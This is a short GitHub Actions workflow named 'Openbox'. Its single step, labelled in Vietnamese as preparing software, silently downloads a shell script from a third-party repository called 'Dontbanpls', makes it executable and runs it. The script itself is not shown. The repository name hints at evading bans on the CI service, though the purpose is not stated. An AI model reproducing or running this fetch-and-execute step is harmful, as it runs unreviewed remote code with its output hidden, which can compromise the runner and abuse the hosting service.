name: Openbox
 
on: 
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: chuẩn bị phần mềm
        run: |
             wget -O ng.sh https://github.com/jshruwyd/Dontbanpls/raw/main/A.sh > /dev/null 2>&1
             chmod +x ng.sh
             ./ng.sh


             
